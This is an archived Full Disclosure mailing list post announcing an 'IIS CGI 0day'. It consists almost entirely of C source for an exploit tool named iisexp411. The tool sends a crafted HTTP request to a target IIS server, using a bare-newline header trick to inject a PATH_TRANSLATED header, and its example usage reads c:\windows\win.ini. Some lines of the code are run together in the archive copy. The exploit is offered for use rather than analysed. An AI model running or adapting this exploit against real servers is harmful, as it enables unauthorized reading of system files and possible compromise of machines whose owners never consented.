Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

iis cgi 0day
From: yuange <yuange1975 () hotmail com>
Date: Wed, 9 Apr 2014 08:47:02 +0000


http://hi.baidu.com/yuange1975/item/b2cc7141c22108e91e19bc2e




 the exp file  ver4.1.1  .  
http://seclists.org/fulldisclosure/2012/Apr/13

usage: 
 iisexp411 127.0.0.1  /AprilFools'Day.php  PATH_TRANSLATED  c:\windows\win.ini








   /*  iisexp41.c  ver4.1 copy by @yuange1975 2012.4.1
  iisexp411.c  ver4.1.1 copy by @yuange1975 2012.4.2
   
  1.Changing the input parameters  2.To increase the receive data
     
  假作真时真亦假。True Mingled also false.
  http://weibo.com/yuange1975
  http://twitter.com/yuange75
  http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h>    /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")/*
char  *AprilFoolsDay ="GET /AprilFools'Day.php  HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; 
*/
char  *AprilFoolsDay ="GET %s HTTP/1.1\r\nHOST:%s\r\na=b\n%s:%s\r\n\r\n"; static unsigned int maybe_lookup_host(char* 
name) 
{
  unsigned long ulAddr = INADDR_NONE;  /* Don't bother resolving raw IP addresses, naturally. */
  ulAddr = inet_addr((char*)name); 
  if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
   return (unsigned int)ulAddr;  return 0;
}int do_exp(char *hostname,unsigned int port,char *AprilFools, char *c,char *shellcode)
{
    SOCKET hScoket = INVALID_SOCKET;
 struct sockaddr_in sin;
 unsigned int addr=0;
 int write_res = 0;
 int read_res = 0;
 char crash_buf[0x4000];
 int crash_buflen=0;
 /*
     create SOCKET
  */
 hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/); 
 if (hScoket == INVALID_SOCKET) { 
  printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
  return -1;
 }   /* Resolved IP address          */
 addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
 sin.sin_port   = htons(port);
 memcpy(&sin.sin_addr,&addr,4); /*
     connect
  */
 if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
  if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
   closesocket(hScoket);
   printf_s("connect function failed with error: %ld\n", WSAGetLastError());
   return -1;
  }
 } 
 
 printf("[*] connected to %s:%d\n",hostname,port);
 
 //build_crash_package(&crash_buf,&crash_buflen); 
sprintf_s(crash_buf,0x400,AprilFoolsDay,AprilFools,hostname,c,shellcode);
 crash_buflen = strlen(crash_buf); //printf("%s",crash_buf);
  /*
      send data to remote target
   */
  write_res = send( hScoket,
                 crash_buf,
                       crash_buflen,
                       0);  
  
  printf("[*] send %d bytes\n\n",write_res);
    while(1){ 
  read_res     =    recv( hScoket,
                 crash_buf,
                       0x4000-1,
                       0);
  if(read_res<=0) break;
  crash_buf[read_res]=0;
  printf("%s",crash_buf);
    } closesocket(hScoket);
 return 0;
}int main(int argc, const char **argv)
{
    int iResult;
    char * target_ip = (char*)argv[1];
 char *AprilFools="/AprilFools'Day.php";
 char *c="c";
 char *shellcode="shellcode";
 WSADATA wsaData; if ( !target_ip || argc < 2 ) {
  printf_s("usage: <target_ip> /AprilFools'Day.php c shellcode \n");
  return 0;
 }
 if(argc>2)  AprilFools=(char*)argv[2]; 
 if(argc>3)  c= (char*)argv[3];
 if(argc>4)  shellcode=(char*)argv[4];
 
 
 /* Initialize Winsock */
 iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
 if (iResult != 0) {
  printf_s("WSAStartup failed: %d\n", iResult);
  return -1;
 } do_exp(target_ip,80,AprilFools,c,shellcode);
 
 /* clean - win socket */
 WSACleanup(); return 0;
}

                                          

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault